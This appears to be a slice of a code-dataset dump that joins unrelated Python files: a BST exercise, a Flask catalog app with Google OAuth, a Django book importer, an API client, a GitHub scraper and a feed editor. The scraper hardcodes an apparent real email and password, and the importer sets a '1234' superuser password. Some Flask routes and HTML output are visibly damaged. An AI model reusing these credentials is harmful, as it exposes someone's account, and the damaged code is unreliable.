print(symbol)\n","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508840713","text":"# https://contest.yandex.ru/contest/28069/problems/E/\n\nclass BSTNode:\n def __init__(self, key=None):\n self.key = key\n self.left = None\n self.right = None\n\n def insert_recursive(self, key):\n if self.key is None:\n self.key = key\n return self\n\n if key == self.key:\n return self\n\n if key < self.key:\n if self.left:\n return self.left.insert_recursive(key)\n self.left = BSTNode(key)\n return self.left\n\n if self.right:\n return self.right.insert_recursive(key)\n self.right = BSTNode(key)\n return self.right\n\n def __iter__(self):\n if self.left:\n for node in self.left:\n yield node\n yield self\n if self.right:\n for node in self.right:\n yield node\n\n\ndef leaves(keys):\n bst = BSTNode()\n for key in keys:\n bst.insert_recursive(key)\n\n results = []\n\n for node in bst:\n if not node.left and not node.right:\n results.append(node.key)\n\n return results\n\n\nassert leaves([7, 3, 2, 1, 9, 5, 4, 6, 8]) == [1, 4, 6, 8]\nassert leaves([7, 3, 3, 3, 2, 1, 9, 5, 4, 6, 8]) == [1, 4, 6, 8]\nassert leaves([9, 4, 2, 1]) == [1]\nassert leaves([1, 6, 8, 2]) == [2, 8]\nassert leaves([1, 7]) == [7]\nassert leaves([7, 1]) == [1]\nassert leaves([3, 1, 2]) == [2]\nassert leaves([3, 1, 2, 0]) == [0, 2]\nassert leaves([5, 4, 3, 2, 1, 0, -1, -2, -3, -4, -5]) == [-5]\nassert leaves([-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5]) == [5]\nassert leaves([4, 2, 4, 6, 2, 4, 1, 6, 2, 4, 3, 1, 6, 2, 4, 5, 3, 1, 6, 2, 4, 7, 5, 3, 1, 6, 2, 4]) == \\\n [1, 3, 5, 7]\n\n\ndef main():\n keys = list(map(int, input().split()))[:-1]\n for key in leaves(keys):\n print(key)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw8/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"594045514","text":"from flask import (\n Flask,\n jsonify,\n request,\n url_for,\n redirect,\n abort,\n g,\n render_template,\n make_response,\n flash,\n session as login_session,\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship, sessionmaker\nfrom sqlalchemy import create_engine, asc, desc\nfrom models import Base, User, Category, Item\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_login import (\n LoginManager,\n login_user,\n logout_user,\n current_user,\n login_required,\n)\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.client import FlowExchangeError\nimport httplib2\nimport requests\nimport json\nimport random\nimport string\n#kiran added\nimport ctypes\n\n#ctypes.windll.shell32.IsUserAnAdmin() windows code required when not running as administrator\nengine = create_engine('sqlite:///catalog_temp_data.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\napp = Flask(__name__)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'showLogin'\n\nCLIENT_ID = json.loads(open('g_auth.json', 'r').read())['web']['client_id']\n\n\n@app.before_request\ndef before_request():\n g.user = current_user\n\n\n@app.route('/token')\n@login_required\ndef get_auth_token():\n token = g.user.generate_auth_token()\n return jsonify({'token': token.decode('ascii')})\n\n\n# Google Login\n@app.route('/gconnect', methods=['POST'])\ndef gconnect():\n if request.args.get('state') != login_session['state']:\n response = make_response(json.dumps('Invalid state parameter.'), 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n code = request.data\n try:\n # Upgrade the auth code into a credentials object\n oauth_flow = flow_from_clientsecrets('g_auth.json', scope='')\n oauth_flow.redirect_uri = 'postmessage'\n credentials = oauth_flow.step2_exchange(code)\n except FlowExchangeError:\n response = make_response(\n json.dumps(\n 'Failed to upgrade the authorization code.'),\n 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Check that the access token is valid\n access_token = credentials.access_token\n url = ('https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=%s'\n % access_token)\n h = httplib2.Http()\n result = json.loads(h.request(url, 'GET')[1])\n\n # If there was an error in the acces token info...abort\n if result.get('error') is not None:\n response = make_response(json.dumps(result.get('error')), 500)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is used for the intended user\n gplus_id = credentials.id_token['sub']\n if result['user_id'] != gplus_id:\n response = make_response(\n json.dumps(\n 'Token user ID does not match given user ID'),\n 401)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Verify that the access token is valid for the app\n if result['issued_to'] != CLIENT_ID:\n response = make_response(\n json.dumps(\n 'Token client id does not match app id'),\n 401)\n response.headers['Content-Type'] = 'application/json'\n return reponse\n\n stored_credentials = login_session.get('credentials')\n stored_gplus_id = login_session.get('gplus_id')\n if stored_credentials is not None and gplus_id == stored_gplus_id:\n response = make_response(\n json.dumps(\n 'Current user is already connected'),\n 200)\n response.headers['Content-Type'] = 'application/json'\n return response\n\n # Store the access token in the session for later user\n login_session['provider'] = 'google'\n login_session['access_token'] = credentials.access_token\n login_session['gplus_id'] = gplus_id\n\n # Get user info\n userinfo_url = \"https://www.googleapis.com/oauth2/v1/userinfo\"\n params = {'access_token': credentials.access_token, 'alt': 'json'}\n answer = requests.get(userinfo_url, params=params)\n data = answer.json()\n\n login_session['username'] = data['name']\n login_session['picture'] = data['picture']\n login_session['email'] = data['email']\n\n # See if user exists, if not...create a new user\n user_id = getUserId(login_session['email'])\n if not user_id:\n user_id = createUser(login_session)\n login_session['user_id'] = user_id\n\n # Log user into the login manager\n user = session.query(User).filter_by(id=user_id).one()\n login_user(user)\n\n flash(\"Successful log on via Google\")\n # Welcome the user\n output = ''\n output += '

Welcome, '\n output += login_session['username']\n output += '!

'\n output += '/items/')\ndef showCategory(category):\n categories = session.query(Category).all()\n items = (\n session.query(\n Item\n )\n .join(Category)\n .filter(Category.name == str(category))\n .all()\n )\n if items:\n print (\"Should be rendering items in a category\")\n return render_template('categories.html',\n categories=categories,\n items=items,\n cur_cat=category)\n else:\n return render_template('categories.html',\n categories=categories,\n cur_cat=category)\n\n\n@app.route('/catalog///')\ndef showItem(category, item_name):\n item = session.query(Item).filter(Item.title == str(item_name)).first()\n return render_template('itemDescription.html', item=item)\n\n\n@app.route('/catalog/add/', methods=['GET', 'POST'])\n@login_required\ndef addItem():\n categories = session.query(Category).all()\n if request.method == 'GET':\n return render_template('addItem.html', categories=categories)\n if request.method == 'POST':\n form_title = request.form.get('title', None)\n form_description = request.form.get('description', None)\n form_category = request.form.get('cat_select', 'Misc.')\n if (\n form_title is None or\n form_description is None or\n form_category is None\n ):\n error = \"Title, description, and category are all required\"\n return render_template('addItem.html',\n categories=categories,\n error=error)\n category = session.query(\n Category\n ).filter_by(name=form_category).first()\n newItem = Item(title=request.form['title'],\n description=request.form['description'],\n category_id=category.id,\n user_id=login_session['user_id'])\n session.add(newItem)\n session.commit()\n flash(\"Item Added\")\n return redirect(url_for('homePage'))\n\n\n@app.route('/catalog//edit/', methods=['GET', 'POST'])\n@login_required\ndef editItem(item_name):\n item = session.query(Item).filter_by(title=item_name).first()\n categories = session.query(Category).all()\n if int(login_session['user_id']) != int(item.user_id):\n return render_template('notAuthorized.html')\n if request.method == 'GET':\n return render_template('editItem.html',\n categories=categories,\n item=item)\n if request.method == 'POST':\n newItem = item\n if request.form['title']:\n newItem.title = request.form['title']\n if request.form['description']:\n newItem.description = request.form['description']\n if request.form['cat_select']:\n category_selected = request.form['cat_select']\n category_for_item = session.query(\n Category\n ).filter_by(name=category_selected).first()\n newItem.category_id = category_for_item.id\n session.add(newItem)\n session.commit()\n flash(\"Item Edited\")\n return render_template('itemDescription.html', item=newItem)\n\n\n@app.route('/catalog//delete/', methods=['GET', 'POST'])\n@login_required\ndef deleteItem(item_name):\n item = session.query(Item).filter(Item.title == str(item_name)).first()\n current_category = item.category.name\n if int(login_session['user_id']) != int(item.user_id):\n return render_template('notAuthorized.html')\n if request.method == 'GET':\n return render_template('deleteItem.html', i_name=item_name)\n if request.method == 'POST':\n session.delete(item)\n session.commit()\n flash(\"Item Deleted\")\n return redirect(url_for('homePage'))\n\n\n# Create a state token to prefent request forgery\n# Store it in the session for later validation\n@app.route('/login', methods=['GET', 'POST'])\ndef showLogin():\n if request.method == 'GET':\n state = ''.join(\n random.choice(\n string.ascii_uppercase + string.digits\n ) for x in xrange(32))\n login_session['state'] = state\n return render_template('login.html', STATE=state, cid=CLIENT_ID)\n return redirect(url_for('homePage'))\n\n\n# Generic Disconnect (multiple providers)\n@app.route('/disconnect')\ndef disconnect():\n if 'provider' in login_session:\n print (\"Disconnecting from provider: %s\" % login_session['provider'])\n if login_session['provider'] == 'google':\n gdisconnect()\n del login_session['gplus_id']\n del login_session['access_token']\n login_session.pop('username', None)\n login_session.pop('email', None)\n login_session.pop('picture', None)\n login_session.pop('user_id', None)\n login_session.pop('provider', None)\n logout_user()\n print (\"Disconnect: User logged out\")\n flash(\"You have successfully been logged out\")\n return redirect(url_for('homePage'))\n\n\n# Helpers for User ops:\ndef getUserId(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\ndef getUserInfo(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef createUser(login_session):\n newUser = User(username=login_session['username'],\n email=login_session['email'],\n picture=login_session['picture'])\n session.add(newUser)\n session.commit()\n user = session.query(User).filter_by(email=login_session['email']).one()\n return user.id\n\n\n# Required for login_manager\n@login_manager.user_loader\ndef user_loader(user_id):\n return session.query(User).filter_by(id=user_id).first()\n\n\nif __name__ == '__main__':\n app.secret_key = json.loads(\n open('g_auth.json', 'r')\n .read())['web']['client_secret']\n app.debug = False\n app.run(host='0.0.0.0', port=8000)\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":13492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"67352799","text":"import sys\nfrom PyQt5 import QtWidgets,QtGui\nfrom PyQt5.QtWidgets import QApplication,QWidget\n\nfrom form import Ui_Form\n\nclass myWindow(QWidget):\n def __init__(self):\n super().__init__()\n self.initUi()\n def initUi(self):\n ui = Ui_Form()\n ui.setupUi(self)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n w = myWindow()\n w.show()\n\n sys.exit(app.exec_())\n\n\n \n\n\n","sub_path":"useUi.py","file_name":"useUi.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"37934225","text":"from mainapp.models import BookCategory, Books\nfrom django.core.management.base import BaseCommand\nfrom auth_app.models import BookUser\nfrom csv import DictReader\n\n\ndef load_books():\n \"\"\" Загрузка CSV-файла с данными для базы. \"\"\"\n \n fields = ['topic','tags','number','author','title','comment','serial','number_serial','folder','file']\n with open('books.csv', 'r', encoding='utf-8') as book_file:\n dw = DictReader(book_file, fields, dialect='excel-tab')\n return list(dw)\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n \"\"\"Заполнение БД. \"\"\"\n\n data = load_books()\n\n for d in data:\n new_book = Books()\n new_book.name=d['title']\n new_book.author = d['author']\n new_book.annotation = d['comment']\n if not len(BookCategory.objects.filter(name=d['topic'])):\n new_cat = BookCategory()\n new_cat.name=d['topic']\n new_cat.save()\n\n new_book.cat_fk = BookCategory.objects.filter(name=d['topic']).first()\n new_book.save()\n\n super_user = BookUser.objects.create_superuser('velimudr', 'velimudr@yandex.ru', '1234', age=40)","sub_path":"book_lib/mainapp/management/commands/imp_db.py","file_name":"imp_db.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"202593554","text":"import json\nfrom quantaq.endpoints import (\n Domain, \n GET, PUT, POST, DELETE\n)\n\n\nclass Data(Domain):\n \"\"\"Initialize the Data group of endpoints.\n\n :returns: Domain for Data\n :rtype: quantaq.models.Data\n \"\"\"\n def __init__(self, client) -> None:\n super(Data, self).__init__(client)\n\n def list(self, **kwargs) -> list:\n \"\"\"Return all data for device with serial number sn.\n\n :param str sn: The device serial number\n :param bool raw: Return the raw (not final), default is False\n :param str start: Start date for data retrieval\n :param str stop: End date for data retrieval\n :param str limit: Limit the number of results returned\n :param str sort: Sort the results by a specific attribute\n :param str filter: Filter the query\n :param int per_page: Define the number of results to return per page\n\n :returns: Data\n :rtype: list of dict\n \"\"\"\n sn = kwargs.pop(\"sn\")\n raw = kwargs.pop(\"raw\", False)\n endpoint = \"devices/\" + sn + \"/data/\"\n \n if raw:\n endpoint += \"raw/\"\n\n return self.client.requests(endpoint, **kwargs)\n\n def bydate(self, **kwargs) -> list:\n \"\"\"Return all data for a device with serial number \n on date .\n\n :param str sn: The device serial number\n :param str date: The date to retrieve data for in YYYY-MM-DD format (all GMT).\n :param bool raw: Return the raw (not final), default is False\n\n :returns: Data\n :rtype: list of dicts\n \"\"\"\n sn = kwargs.pop(\"sn\")\n date = kwargs.pop(\"date\")\n raw = kwargs.pop(\"raw\", False)\n\n endpoint = \"devices/\" + sn + \"/data-by-date/\"\n if raw:\n endpoint += \"raw/\"\n \n endpoint += date + \"/\"\n\n return self.client.requests(endpoint)\n\n def get(self, **kwargs) -> dict:\n \"\"\"Return a single data point.\n\n :param str sn: The device serial number\n :param int id: The id of the data point\n :param bool raw: Return the raw (not final), default is False\n\n :returns: Data information\n :rtype: dict\n \"\"\"\n sn = kwargs.pop(\"sn\")\n id = kwargs.pop(\"id\")\n raw = kwargs.pop(\"raw\", False)\n\n endpoint = \"devices/\" + sn + '/data/'\n if raw:\n endpoint += \"raw/\"\n endpoint += str(id)\n\n return self.client.requests(endpoint)\n","sub_path":"quantaq/endpoints/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346245494","text":"import requests\nimport json\nimport time\nstart_time = time.time()\nheaders = {\n 'Cookie': '_ga=GA1.2.1070810950.1562851528; _octo=GH1.1.620303813.1562851528; logged_in=yes; dotcom_user=zelincode; _gat=1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36',\n 'Host': 'api.github.com'\n}\n# url = \"https://api.github.com/search/repositories?q=stars%3A%3E1&page={}&per_page=100&sort=stars\"\nurl = \"https://api.github.com/search/repositories?q=stars%3A100..{}&page={}&per_page=100&sort=stars\"\njson_filename = 'github.json' #这是json文件存放的位置\nstars = 304025\nnum= 0 #\ncount = 0 #总共调用API次数\ni =0 #每次搜索后页面循环次数\nwhile 1:\n i = (i+1)%10\n if(count == 5000):\n stop_time = time.time()\n duration = stop_time - start_time\n time.sleep(3600-duration)\n start_time = time.time()\n count=0\n try:\n r = requests.get(url.format(stars,i),headers,timeout = 5)\n count += 1\n response_dict = r.json()\n print(\"Total repositories:\", response_dict['total_count'])\n with open(json_filename,\"a\",encoding = \"utf-8\") as f:\n repo_dicts = response_dict['items']\n for repo_dict in repo_dicts:\n num += 1\n info=[]\n\n ##repo的信息\n info.append(repo_dict['name'])\n info.append(repo_dict[\"description\"])\n info.append(repo_dict[\"html_url\"])\n info.append(repo_dict['stargazers_count'])\n info.append(repo_dict['watchers']) #watchers\n info.append(repo_dict['forks']) #forks\n\n info.append(repo_dict['created_at'])\n info.append(repo_dict['updated_at'])\n info.append(repo_dict['language'])\n\n ##下面是owner的信息\n name = repo_dict['owner']['login']\n info.append(name)\n myURL=\"https://api.github.com/users/\"+name\n context = requests.get(myURL,headers,auth=(\"771958907@qq.com\",\"ww050607\"),timeout = 5).json()\n count += 1\n info.append(context['company'])\n info.append(context['location']) #\n info.append(context[\"public_repos\"]) #public_repos\n info.append(context[\"followers\"]) #followers\n info.append(context[\"following\"]) #\n info.append(context[\"created_at\"]) #\n info.append(context[\"updated_at\"]) #\n\n\n\n\n f.write(str(info).lstrip(\"[\").rstrip(\"]\")+ '\\n')\n print(num,\"爬取完成\")\n if(num == 1000):\n break\n\n except requests.exceptions.RequestException as e:\n print(e)\n\n","sub_path":"Github分析/api_stars_1000.py","file_name":"api_stars_1000.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14071759","text":"import unittest\nfrom money_change_again import change\n\n\ndef reference(money):\n min_coins = float(\"inf\")\n\n for num1 in range(money + 1):\n for num3 in range(money // 3 + 1):\n for num4 in range(money // 4 + 1):\n if 1 * num1 + 3 * num3 + 4 * num4 == money:\n min_coins = min(min_coins, num1 + num3 + num4)\n\n return min_coins\n\n\nclass MoneyChangeAgain(unittest.TestCase):\n def test_small(self):\n for money in range(1, 40):\n self.assertEqual(change(money), reference(money))\n\n def test_large(self):\n for money, answer in ((200, 50), (239, 60), (31, 8)):\n self.assertEqual(change(money), answer)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"money_change_again/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"43669173","text":"\"\"\"\nThis module handles communication of data to the FPAA\n\"\"\"\n\nimport os\nfrom os.path import join\nfrom dowel import logger\nfrom time import sleep\n\n\nclass FpaaConfig:\n def __init__(self, config_data=None):\n \"\"\"This class handles flashing and evaluating the FPAA bitstream\"\"\"\n clean_config_dir()\n self.id = get_new_id()\n if config_data is not None:\n self.load_fpaa(config_data)\n\n @property\n def basedir(self):\n \"\"\"Returns this bitstream's directory.\"\"\"\n return join(get_config_dir(), str(self.id))\n\n def load_fpaa(self, config_data):\n \"\"\"Loads a 2d array of configuration data onto to the FPAA\"\"\"\n logger.start_timer() \n raise NotImplementedError\n logger.stop_timer('INTERFACE.PY load_fpaa')\n\n def evaluate(self, data):\n \"\"\"Evaluates given data on the FPAA.\"\"\"\n logger.start_timer()\n results = []\n for datum in data:\n pred = None\n while pred is None:\n try:\n raise NotImplementedError\n except (UnicodeDecodeError, ValueError):\n pass\n results.append(pred) \n logger.stop_timer('INTERFACE.PY Evaluation complete')\n return results\n","sub_path":"varro/fpaa/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"515713454","text":"# Copyright 2009 Gabriel Farrell\n#\n# This file is part of Kochief.\n#\n# Kochief is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Kochief is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Kochief. If not, see .\n\nfrom django.conf.urls.defaults import *\n\nurlpatterns = patterns('kochief.cataloging.views',\n url(r'^r/(.*)\\.rdf$', 'resource_view', {'format': 'xml'},\n name='resource_rdf'),\n url(r'^r/(.*)\\.n3$', 'resource_view', {'format': 'n3'},\n name='resource_n3'),\n url(r'^r/(.*)\\.nt$', 'resource_view', {'format': 'nt'},\n name='resource_nt'),\n url(r'^r/(.*)$', 'resource_view', name='resource'),\n)\n","sub_path":"kochief/cataloging/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"344858737","text":"from pymongo import MongoClient\r\nimport cgi\r\nimport sys\r\nimport json\r\nimport cgitb\r\nimport configparser\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport mwfeeds.controlers.ParseFeed\r\nimport mwfeeds.controlers.GetJavascriptPage\r\nfrom django.http import JsonResponse\r\nfrom django.shortcuts import render\r\nfrom django.views.decorators.csrf import csrf_exempt\r\n\r\ncgitb.enable()\r\nconfig = configparser.ConfigParser()\r\nconfig.read('/opt/python/current/app/mwfeeds/mwfeeds.cfg')\r\n\r\ndef index(req):\r\n id = req.GET.get('id', '')\r\n if id == '':\r\n c = {}\r\n c['id'] = id\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n c[\"subView\"] = \"EditFeed.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n else:\r\n return editById(req,id)\r\n\r\ndef editHTMLById(req,myFeed):\r\n c = {}\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n c = myFeed\r\n thisURL = c[\"url\"]\r\n try:\r\n uglyHTML = \"\"\r\n if c[\"javascriptEnabled\"] == True:\r\n uglyHTML = mwfeeds.controlers.GetJavascriptPage.getJavascriptPage(c[\"url\"])\r\n else:\r\n fp = urllib.request.urlopen(thisURL)\r\n mybytes = fp.read()\r\n uglyHTML = mybytes.decode(\"utf8\")\r\n c[\"HTMLSourceText\"] = uglyHTML\r\n prettyHTML = BeautifulSoup(uglyHTML, 'html.parser').prettify()\r\n html_escape_table = {\r\n \"&\": \"&\",\r\n '\"': \""\",\r\n \"'\": \"'\",\r\n \">\": \">\",\r\n \"<\": \"<\",\r\n \" \": \" \",\r\n \"\\n\": \"
\"\r\n }\r\n c[\"HTMLPrettyText\"] = \"\".join(html_escape_table.get(c,c) for c in prettyHTML)\r\n fp.close()\r\n except:\r\n c[\"HTMLSourceText\"] = \"Unable to load \"+thisURL\r\n if myFeed[\"feedType\"] == \"HTML\":\r\n c[\"id\"] = c[\"_id\"]\r\n c[\"subView\"] = \"EditFeedHTML.pyv\"\r\n c[\"HTMLMatchList\"] = json.dumps(mwfeeds.controlers.ParseFeed.parseFeed(c))\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editSetEncodingById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedSetEncoding.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editCombineById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedCombine.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editSharepointById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedSharepoint.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editRegionFixById(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedRegionFix.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editNotSupported(req,myFeed):\r\n c = {}\r\n c = myFeed\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"subView\"] = \"EditFeedNotSupported.pyv\"\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\ndef editById(req,id):\r\n try:\r\n c = {}\r\n owner = req.session['token']\r\n c['token'] = owner\r\n if owner == \"\" or (\"meltwater.com\" not in owner and \"a3logics.in\" not in owner):\r\n c[\"subView\"] = \"Login.pyv\"\r\n else:\r\n c[\"activeurl\"] = config.get(\"active\", \"baseUrl\")\r\n client = MongoClient(config.get(\"active\", \"DBUrl\"))\r\n db = client.mwfeeds\r\n feedsCollection = db.feeds\r\n myFeed = feedsCollection.find_one({\"_id\":int(id)})\r\n myFeed[\"id\"] = myFeed[\"_id\"]\r\n if myFeed[\"feedType\"] == \"HTML\":\r\n return editHTMLById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"SetEncoding\":\r\n return editSetEncodingById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"Combine\":\r\n return editCombineById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"Sharepoint\":\r\n return editSharepointById(req,myFeed)\r\n elif myFeed[\"feedType\"] == \"RegionFix\" or myFeed[\"feedType\"] == \"Region Fix\":\r\n return editRegionFixById(req,myFeed)\r\n else:\r\n return editNotSupported(req,myFeed)\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n except Exception as ex:\r\n c[\"subView\"] = \"Login.pyv\"\r\n c[\"message\"] = str(ex)\r\n return render(req, \"index.pyv\", c, content_type=\"text/html\")\r\n\r\n@csrf_exempt\r\ndef save(req):\r\n try:\r\n raw=req.body.decode(\"utf-8\")\r\n form = json.loads(raw)\r\n req.content_type = \"application/json\"\r\n client = MongoClient(config.get(\"active\", \"DBUrl\"))\r\n db = client.mwfeeds\r\n feedsCollection = db.feeds\r\n outArray = form\r\n feedsCollection.find_one_and_update({\"_id\": int(form[\"id\"])},{\"$set\": outArray})\r\n return JsonResponse({\"success\": True})\r\n except Exception as e:\r\n return JsonResponse({\"success\": False, \"message\": str(e)})","sub_path":"mwfeeds/controlers/EditFeed.py","file_name":"EditFeed.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"282783676","text":"from pathlib import Path\nimport requests\nimport logging\nimport util\nimport subprocess\n\nserver_tests_enabled = True # use True to invoke server_tests on server startup\n\n\"\"\"\n These are server tests for the default Sample DB.\n See https://github.com/valhuber/ApiLogicServer/wiki/Tutorial#customize-server-startup\n\n Disable this, above\n\"\"\"\n\napi_logic_server_summary = True # Prints a banner\n\n\ndef prt(msg: any) -> None:\n util.log(f'{msg}')\n\n\ndef get_project_dir() -> str:\n \"\"\"\n :return: ApiLogicServer dir, eg, /Users/val/dev/ApiLogicServer\n \"\"\"\n path = Path(__file__)\n parent_path = path.parent\n parent_path = parent_path.parent\n return parent_path\n\n\ndef server_tests(host, port, version):\n \"\"\" called by api_logic_server_run.py, for any tests on server start\n args\n host - server host\n port - server port\n version - ApiLogicServer version\n \"\"\"\n\n if api_logic_server_summary:\n util.log(f'\\nAPILOGICSERVER SUMMARY')\n util.log(f'======================\\n')\n prt(f''\n f'1. CUSTOMIZABLE SERVER PROJECT CREATED\\n'\n f' .. Explore your project - open with IDE/Editor at {get_project_dir()}\\n'\n f'2. SERVER STARTED\\n'\n f' .. Explore your API - Swagger at http://{host}:{port}\\n'\n f' .. Re-run it later - python api_logic_server_run.py\\n'\n f'3. LOGIC enabled\\n'\n f' .. Explore it at {get_project_dir()}/logic/logic_bank.py\\n'\n f' .. E.g., see https://github.com/valhuber/ApiLogicServer/blob/main/api_logic_server_cli/nw_logic.py\\n'\n f'4. BASIC WEB APP Created\\n'\n f' .. Start it: python ui/basic_web_app/run.py [host port]]\\n'\n f' .. Then, explore it - http://0.0.0.0:8080/ (login: admin, p)\\n'\n f' .. See https://github.com/valhuber/ApiLogicServer/wiki/Tutorial#3-explore-the-basic-web-app\\n'\n f'\\n'\n f'===> For more information, see https://github.com/valhuber/ApiLogicServer/wiki/Tutorial\\n'\n f'\\n'\n f'SUCCESSFUL SERVER START (ApiLogicServer Version {version}) - see ApiLogicServer Summary, above\\n')\n","sub_path":"prototype/test/server_startup_test.py","file_name":"server_startup_test.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257755728","text":"\"\"\"\nThe Python standard library's 'calendar' module allows you to\nrender a calendar to your terminal.\nhttps://docs.python.org/3.6/library/calendar.html\n\nWrite a program that accepts user input of the form\n `14_cal.py month [year]`\nand does the following:\n - If the user doesn't specify any input, your program should\n print the calendar for the current month. The 'datetime'\n module may be helpful for this.\n - If the user specifies one argument, assume they passed in a\n month and render the calendar for that month of the current year.\n - If the user specifies two arguments, assume they passed in\n both the month and the year. Render the calendar for that\n month and year.\n - Otherwise, print a usage statement to the terminal indicating\n the format that your program expects arguments to be given.\n Then exit the program.\n\"\"\"\n\nimport sys\nimport calendar\nfrom datetime import datetime\n\n# Ensures arguments are formatted correctly based on string length\ndef argCheck(arg1, arg2):\n\n if( len( arg1 ) > 2 or len( arg2 ) > 4):\n return False\n\n else:\n return True\n\n# Generates a calendar based on number of inputs\ndef generate_calendar( input ):\n if input == 3:\n # Check Format\n if not argCheck( sys.argv[1], sys.argv[2] ):\n return \"Please enter format MM YYYY\"\n\n # Full User 